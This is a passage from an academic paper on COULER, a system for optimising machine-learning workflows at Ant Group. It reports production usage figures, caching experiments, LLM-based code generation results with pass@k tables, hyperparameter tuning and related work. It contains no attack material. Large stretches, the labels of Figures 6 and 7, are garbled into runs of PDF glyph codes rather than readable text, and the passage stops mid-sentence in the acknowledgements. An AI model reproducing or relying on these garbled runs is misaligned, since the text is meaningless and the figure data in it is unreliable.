/uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000015/uni00000018/uni00000013/uni00000011/uni00000016/uni00000013/uni00000013/uni00000011/uni00000016/uni00000018/uni00000013/uni00000011/uni00000017/uni00000013/uni00000013/uni00000011/uni00000017/uni00000018/uni00000013/uni00000011/uni00000018/uni00000013/uni00000013/uni00000011/uni00000018/uni00000018/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni00000003/uni0000000b/uni00000008/uni0000000c/uni00000026/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000026/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n(a) Yearlong evolution of CUR\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b /uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000015/uni00000013/uni00000013/uni00000011/uni00000015/uni00000018/uni00000013/uni00000011/uni00000016/uni00000013/uni00000013/uni00000011/uni00000016/uni00000018/uni00000013/uni00000011/uni00000017/uni00000013/uni00000013/uni00000011/uni00000017/uni00000018/uni00000013/uni00000011/uni00000018/uni00000013/uni00000030/uni00000048/uni00000050/uni00000052/uni00000055/uni0000005c/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni00000003/uni0000000b/uni00000008/uni0000000c/uni00000030/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000030/uni00000038/uni00000035/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c (b) Yearlong evolution of MUR\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b /uni00000014/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000004f/uni0000004c/uni00000051/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni0000000b/uni00000030/uni00000052/uni00000051/uni00000057/uni0000004b/uni0000000c/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000018/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001a/uni00000013/uni00000011/uni0000001b/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni00000026/uni00000052/uni00000050/uni00000053/uni0000004f/uni00000048/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000035/uni00000044/uni00000057/uni00000048/uni0000000b/uni00000008/uni0000000c/uni00000018/uni00000013/uni00000026/uni00000010/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c/uni00000003\n/uni00000018/uni00000013/uni00000026/uni00000010/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c/uni00000018/uni00000013/uni00000026/uni0000000e/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c\n/uni00000018/uni00000013/uni00000026/uni0000000e/uni00000003/uni0000000b/uni0000005a/uni00000012/uni00000003/uni00000026/uni00000032/uni00000038/uni0000002f/uni00000028/uni00000035/uni0000000c (c) Yearlong evolution of WCR\nFig. 6: From July 2022 to July 2023, 90% workflows in the cluster were transitioned to utilize C OULER in A NTGROUP\nWorkload. We design a multi-modal workflow in an isolated\nproduction environment to minimize interference of the pro-\nduction environment and conduct a more comprehensive as-\nsessment of C OULER \u2019s capabilities. By selecting appropriate\ncomponent containers for model training, we evaluated the\nsystem\u2019s caching efficiency as well as the performance of its\nAutoML features. This workflow comprises two distinct tasks:\nimage classification and language model fine-tuning. We tested\nthe performance of models such as ViT and nanoGPT. Ad-\nditionally, the workflow incorporates system testing modules\nand model update modules, increasing the task complexity to\nbetter emulate real-world scenarios. The workflow includes 26\ndifferent training scenarios and comprises 52 working pods,\nutilizing over 1.4 million images and 20GB of text data as\ndatasets. Operating in contexts with a significant number of\nparameters and data volume, it effectively showcases C OULER\n\u2019s unique features.\nB. Workflow Activity: RQ1\nInitially, we explore three facets of ML workflows: daily\nusage frequency, typical lifespan, and CPU core usage. We\nfocus on workflows within A NTGROUP from July 2022 to July\n2023. Figure 5a illustrates the distribution of the average daily\nworkflow count, revealing a daily average of 22,000 workflows\nwithin A NTGROUP . We define a workflow\u2019s lifespan as the\nhour count between the timestamps of its newest and oldest\nnodes in its trace, serving as an indicator of its active duration.Figure 5b depicts that, on average, a workflow within A NT\nGROUP remains active for 1 hour. Figure 5c presents the\naverage CPU cores utilized by a workflow during its active\nperiod, with a mean of 36 cores being used per workflow in\nANTGROUP .\nTo assess the effectiveness of C OULER in optimizing work-\nflows, we examine the evolution information of C OULER\nwithin A NTGROUP from July 2022 to July 2023, as depicted\nin Figure 6. It took approximately ten months to execute all\nworkflows with C OULER . Figure 6a reveals that the CPU\nutilization rate (CUR) in machine learning workflow improved\nby 18%. Figure 6b shows that the memory utilization rate\n(MUR) improved by 17%. C OULER \u2019s enhanced fault tolerance\nsignificantly improved the workflow completion rate (WCR)\nfor workflows running on 50- and 50+ CPU cores. Due to\nthe high utilization rate of C OULER , the CUR, MUR, and\nWCR have seen notable improvements. Therefore, C OULER\nhas effectively optimized ML workflow performance within\nANTGROUP .\nProduction insights. Our work is motivated by previous re-\nsearch conducted within Google GCP [53], which highlighted\nsubstantial computational waste in ML workflows. Building\non these findings, our contributions are diverse, encompassing\nsimplicity and extensibility, automation, efficiency, as well as\nreal-world impact and adoption. We believe the real-world\nadoption and application of our system by A NTGROUP and\nother organizations attest to its practicality and efficacy in/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000014/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000015/uni00000013/uni00000013/uni00000013/uni00000011/uni00000013 /uni00000015/uni00000018/uni00000013/uni00000013/uni00000011/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000017/uni00000013/uni00000011/uni00000013/uni00000019/uni00000013/uni00000011/uni00000013/uni0000001b/uni00000013/uni00000011/uni00000013/uni00000014/uni00000013/uni00000013/uni00000011/uni00000013/uni00000014/uni00000015/uni00000013/uni00000011/uni00000013/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f(a) Multimodal Training\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000015/uni00000013/uni00000013 /uni00000017/uni00000013/uni00000013 /uni00000019/uni00000013/uni00000013 /uni0000001b/uni00000013/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018/uni00000016/uni00000013/uni00000016/uni00000018/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f (b) Image Segmentation\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000003/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000057/uni0000004c/uni0000004f/uni0000004c/uni0000005d/uni00000044/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000031/uni00000052/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni00000015/uni00000013/uni00000013 /uni00000017/uni00000013/uni00000013 /uni00000019/uni00000013/uni00000013 /uni0000001b/uni00000013/uni00000013 /uni00000014/uni00000013/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000013/uni00000013 /uni00000014/uni00000017/uni00000013/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048/uni0000000b/uni00000050/uni0000004c/uni00000051/uni0000000c/uni00000015/uni00000013/uni00000015/uni00000018/uni00000016/uni00000013/uni00000016/uni00000018/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a/uni00000003/uni00000036/uni00000057/uni00000052/uni00000055/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000026/uni00000052/uni00000051/uni00000056/uni00000058/uni00000050/uni00000053/uni00000057/uni0000004c/uni00000052/uni00000051/uni0000000b/uni0000002a/uni00000025/uni0000000c\n/uni00000033/uni00000048/uni00000055/uni00000049/uni00000052/uni00000055/uni00000050/uni00000044/uni00000051/uni00000046/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000024/uni00000058/uni00000057/uni00000052/uni00000050/uni00000044/uni00000057/uni0000004c/uni00000046/uni00000003/uni00000026/uni00000044/uni00000046/uni0000004b/uni0000004c/uni00000051/uni0000004a\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000031/uni00000052\n/uni00000024/uni0000004f/uni0000004f (c) Language Model Fine-tuning\nFig. 7: Effect of C OULER on Resource Utils and Workflow Execution Time\nproduction settings. Due to space constraints, we put extensive\ndiscussions on production insights into the Appendix E.\nC. Performance Study with Caching: RQ2\n1) Performance study with Automatic caching: We evaluate\nthe impact of C OULER \u2019s automatic caching strategy on\nworkflow execution efficiency by comparing execution time\nand resource utilization against other caching strategies across\nthree different scenarios:\n\u2022Multimodal Training : This scenario encompasses 37\npods and 19 training models, and involves a training\nprocess that integrates various types of input data such as\ntext, images, and sound, aimed at building more robust\nand adaptable models.\n\u2022Image Segmentation : This scenario includes 15 pods and\n8 training models, focusing on segmenting digital images\ninto multiple parts or sub-regions to identify and locate\nobjects and boundaries within images.\u2022Language Model Fine-tuning : This scenario consists of\n21 pods and 11 training models, primarily focusing on\nfurther training of pre-trained language models tailored\nfor specific tasks such as text classification or sentiment\nanalysis.\nWe evaluate the execution time and caching storage con-\nsumption across five different caching strategies as follows:\n(1)No, indicating no caching; (2) ALL , involving the caching\nof all data and intermediate results; (3) C OULER , representing\nCOULER \u2019s automatic caching policy. (4) FIFO , first in first\nout; (5) LRU , least recently used. Based on empirical experi-\nence, we choose \u03b1= 1.5and\u03b2= 1 in these experiments for\nequation 6.\nFigure 7 illustrates the variations in CPU and GPU usage\nover time, comparing C OULER \u2019s caching strategy with other\ncaching strategies. Due to space constraints, detailed experi-\nmental results for FIFO and LRU can be found in Appendix\nD.A. It is evident that employing C OULER \u2019s caching strategy\nenhances GPU and CPU utilization, allowing the entire processto complete in less time. This is because that automatio cache\nmechanism can reduce the frequency of I/O operations. And\naccording to existing work [10], [36], this reduction in I/O\noverhead is significant as it can substantially decrease the\ntime wasted on these operations, leading to a more efficient\nworkflow execution. The scatter plot represents the overall exe-\ncution time and resource consumption of workflows of varying\nsizes, indicating that C OULER \u2019s caching strategy achieves\nhigher execution efficiency with a smaller additional resource\ncost. C OULER \u2019s strategy tends to conserve resources by\navoiding unnecessary caching, yet still reaps the performance\nbenefits of caching the most impactful intermediate results.\nWe also calculate the cache hit ratio of the C OULER caching\nstrategy, which, under reasonably set parameters, averages\n84.21% in production environments, significantly improving\nthe efficiency of workflow execution.\n2) Performance study with Data caching: In this section,\nwe investigate the impact of caching on data reading perfor-\nmance by first examining the effect of table caching using two\ntables from an ads recommendation application, highlighting\nhow caching enhances data loading and deep learning model\ntraining efficiency on a hybrid cluster. Secondly, we assess\nthe caching performance for reading small and big files stored\nremotely, demonstrating significant improvements in data read-\ning speed through local caching. Due to space constraints, we\nput detailed discussions into the Appendix D.C.\n3) Performance Study with Cache Sizes: We further de-\nsigned experiments to analyze the impact of different cache\nsizes on C OULER \u2019s performance. In the same three scenarios:\nMultimodal Training, Image Segmentation, and Language\nModel Fine-tuning, we set the available cache sizes to 10G,\n20G, and a more ample 30G, respectively, and recorded the\nresource utilization and execution time of the workflows under\nthese conditions. Detailed experimental results can be found in\nAppendix D.B.Analysis shows that, under limited cache size\nconditions, C OULER can still effectively improve the efficiency\nof workflow execution, but its effectiveness increases with the\nsize of the cache.\nD. NL to Unified Programming Code Generation: RQ3\n1) Experiment Result: We evaluate the effectiveness of\nutilizing LLMs to facilitate NL to Unified Programming Code\nGeneration and compare our method with GPT-3.5 and GPT-4,\nas shown in Table II. All models are evaluated at temperatures\nt\u2208 {0.2,0.6,0.8}, and we compute pass@k where k\u2208\n{1,3,5}for each model. The temperature yielding the best-\nperforming pass@k for each kis selected according to [30].\nThe \u2019pass@k\u2019 metric is a widely used evaluation method\nin code generation models. It assesses the model\u2019s capacity\nto produce accurate code within its top \u2019k\u2019 predictions. A\nhigher \u2019pass@k\u2019 percentage indicates the model\u2019s reliability in\ngenerating correct code options without the need for additional\ninputs or iterations. Our method significantly improves the\nperformance of GPT-4 for NL to unified programming code\ngeneration and has been widely adopted for C OULER code\ngeneration.TABLE II: Evaluation results of our methods with GPT-\n3.5 and GPT-4. Each pass@k (where k\u2208 {1,3,5}) for\neach model is computed with three sampling temperatures\n(t\u2208 {0.2,0.6,0.8}) and the highest one among the three are\ndisplayed, which follows the evaluation procedure in [30].\nModelpass@ k[%]\nk= 1 k= 3 k= 5\nGPT-3.5 35.21 37.19 39.21\nGPT-4 45.81 48.11 50.23\nGPT-3.5 + Ours 61.25 62.97 65.03\nGPT-4 + Ours 73.12 75.61 77.38\n2) Running Example: We provided an example that illus-\ntrates the entire process of converting natural language into\nCOULER code. It demonstrates the generation of syntactically\ncorrect code by the LLM. This example aims to select the best\nimage classification model among ResNet, ViT, and DenseNet\nby showing the transformation from natural language descrip-\ntions to code generation. The details are presented in Appendix\nC.\n3) Cost Analysis and Future Prospects Discussion: On the\nmatter of cost, we understand the concerns about the economic\nfeasibility of deploying LLMs, especially considering the cost\nper token for each workflow. So we present the average costs\nfor each workflow in terms of the number of tokens processed\nby LLMs and the corresponding money for model \u201cGPT-\n3.5-turbo\u201d and \u201cGPT-4\u201d in Table III. C OULER has shown\npromising results for a range of tasks except for some complex\nworkflows. The use of LLMs in our research is primarily\naimed at exploring the potential of these models to streamline\nand enhance the code generation process.\nTABLE III: Cost Analysis of Workflow Generation\nCost / WorkflowWorkflow Generation\nGPT-3.5-turbo GPT-4\nToken 3212.1 3813.7\nMoney ($) 0.005 0.140\nWe acknowledge that current LLMs already demonstrate\na satisfactory level of accuracy in code generation. Indeed,\nwe are considering fine-tuning as a viable method to enhance\nthe quality of the generated code. Specifically, our team\nhas conducted work on Multi-LoRA optimization for fine-\ntuning [55]. Additionally, we are developing a workflow for\ncode generation by fine-tuning \u2018llama2\u2019. We will soon release\na fine-tuned model in the C OULER open-source repository.\nE. Automatic Hyperparameter Configuration: RQ4\nWe next evaluate the performance of automatic hyperparam-\neters configuration using LLMs to generate recommended hy-\nperparameters. Following the workflow detailed in Workload,\nwe apply automated hyperparameter tuning to both the cvand\nnlpmodules, with HP:Ours as our recommended parameter.\nAs depicted in Figure 8, the recommended parameters exhibit0 20 40 60 80 100\nEpoch01234Loss\nLoss Over Epochs\nHP:Ours\nHP:baseline1\nHP:baseline2\n0 20 40 60 80 100\nEpoch0.20.40.60.8Accuracy\nAccuracy Over Epochs\nHP:Ours\nHP:baseline1\nHP:baseline2(a) Auto Configuration for CV\n0 20 40 60 80 100\nEpoch0.30.40.50.60.7Loss\nLoss Over Epochs\nHP:baseline1\nHP:baseline2\nHP:Ours\n0 20 40 60 80 100\nEpoch0.50.60.70.80.9Accuracy\nAccuracy Over Epochs\nHP:baseline1\nHP:baseline2\nHP:Ours (b) Auto Configuration for NLP\nFig. 8: Effect of Auto Hyperparameter Configuration\nthe lowest loss and the highest accuracy, showcasing the potent\ncapability of C OULER \u2019s Automatic Hyperparameter Tuning.\nHP-baseline1 represents a set of hyperparameters that were\nmanually selected based on expert knowledge and empirical\nbest practices in the field. HP-baseline2 corresponds to a set\nof hyperparameters derived from historical benchmarks and\nrecommendations in the literature.\nF . Comparative Learning Analysis of Workflow Engines\nTo assess the effectiveness of our system\u2019s unified pro-\ngramming model, we conducted a survey, where we asked 15\nengineers who were not familiar with these workflow engines\nto learn and use code snippets with similar functionality in\nCOULER , Argo, and Airflow. We measured the time it took for\nthem to understand and work with the provided code samples.\nThe results of this survey in Table IV clearly indicate that our\nCOULER API is more user-friendly and easier to learn.\nTABLE IV: Workflow Learning Comparative Analysis\nTime / WorkflowWorkflow Engines\nCOULER Argo Airflow\nTime (min) 18 61 50\nVII. R ELATED WORK\nJobs Scheduling in the Cloud. One machine learning\nworkflow usually includes different stages to produce the\nmodel, and each stage/step is associated with different kinds\nof jobs [7], [23], [35], [39]. Kubernetes [38] boasts a rapidly\ngrowing community and ecosystem, providing robust support\nfor workflows. Kubernetes is based on a highly modular\narchitecture that abstracts the underlying infrastructure and\nallows internal customization. It supports various big-data\nframeworks (e.g. Apache Hadoop MapReduce [17], [41],\nApache Spark [56], Apache Kafka [19], Apache Flink [14]etc). More recently, Kubeflow [23] allows users to submit\ndistributed machine learning tasks on Kubernetes.\nWorkflow for AI/Machine Learning. One machine learn-\ning workflow usually includes different stages to produce the\nmodel, and each stage/step is associated with different kinds\nof jobs [7], [23], [35]. Kubernetes [38] boasts a rapidly grow-\ning community and ecosystem, providing robust support for\nworkflows. TFX [27] is a TensorFlow based AI framework for\nmachine learning model training, but it is specifically designed\nfor TensorFlow only. Some works in the HCI community study\nML/DS workflows by interviewing ML developers and data\nscientists [57].\nWorkflow Engine. A workflow engine is a software ap-\nplication that manages business processes. Argo Workflows\n[5] is an open-source container-native workflow engine for\norchestrating parallel jobs on Kubernetes. Apache Airflow [2]\nis a Python-based platform for running directed acyclic graphs\n(DAGs) of tasks. Apache OOzie [32] is a workflow engine in\nthe Hadoop ecosystem. Kubeflow [23] has a sub-project called\nKubeflow Pipelines for end-users to develop machine learning\npipelines. The complementary list of workflow engines can be\nfound in link [51]. There are also recently workflow engines\nlike Ray [28], CodeFlare [11] and ThunderML [40]. C OULER\nis inspired by the design of PyTorch [34], which compiles a\nhigh-level AI model to a DAG.\nAutomated Machine Learning. Automated Machine\nLearning (AutoML) [18], [48] simplifies the process of ma-\nchine learning model selection and hyper-parameter tuning,\nthereby making ML more accessible to non-experts. In the last\ndecade, substantial advancements in AutoML have emerged\nwith the introduction of open-source frameworks such as Auto-\nWEKA [22], [46], AutoSklearn [13], AutoGluon [12], and\nAuto-PyTorch [59], alongside commercialized frameworks.\nWorkflow Optimization and Query Optimization. Work-\nflow optimization applies broadly, covering areas such as\nscientific workflows, business processes, and cloud computing,\nand addresses tasks beyond data processing, including compu-\ntational and data movement activities. It also faces unique chal-\nlenges like deadlines, budget constraints, and fault tolerance,\nwhich are less common in query optimization. Additionally,\nworkflow optimization utilizes specific strategies like dynamic\nscheduling, partitioning, and machine learning for predictive\noptimization, highlighting its distinct requirements compared\nto the more static nature of query optimization.\nVIII. C ONCLUSION\nIn this paper, we introduced C OULER , a system de-\nsigned for unified machine learning workflow optimization\nin the cloud. C OULER simplifies ML workflow generation\nusing NL descriptions, abstracting the complexities associated\nwith different workflow engines. Furthermore, C OULER boosts\ncomputational efficiency through automated caching, large\nworkflow auto-parallelization, and hyperparameter tuning.\nIX. A CKNOWLEDGEMENT\nWe want to thank Wei Yan who led the initial discussions of\nthe design and implementation of this project. We would liketo thank many colleagues at Alibaba Group and Ant Group\nfor their valuable advice that improved this project, namely,\nLan Li, Jian Liu, Wei Shu, Changhua He, Yi Wang, Jun Jiang,\nChunbo Dai, Chenyi Ding, Mu Xiong, Yitao Shen, Yi Zhang,\nXiaohua Cai, and Qinglong Wang. In addition, we appreciate\nthe timely review and feedback from the Argo team every\ntime when we contributed 